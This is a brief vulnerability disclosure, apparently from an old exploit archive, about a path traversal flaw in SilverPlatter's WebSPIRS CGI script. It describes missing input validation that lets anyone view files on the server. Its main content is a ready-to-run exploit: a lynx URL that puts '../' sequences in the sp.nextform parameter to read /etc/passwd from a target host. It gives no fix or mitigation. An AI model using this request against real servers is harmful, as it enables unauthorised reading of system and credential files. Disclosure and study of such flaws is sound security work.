Name : WebSPIRS CGI script "show files" Vulnerability. About : WebSPIRS is SilverPlatter's Information Retrieval System for the World Wide Web (WWW). It is a common gateway interface (CGI) application which allows any forms-capable browser, such as Netscape, to search SilverPlatter (SP) Electronic Reference Library (ERL) databases available over the Internet. http://www.silverplatter.com. Problem: Problem lyes in incorrect validation of user submitted -by-browser information, that can show any file of the system where script installed. Exploit: lynx http://www.target.com/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd by: UkR-XblP (cuctema@ok.ru)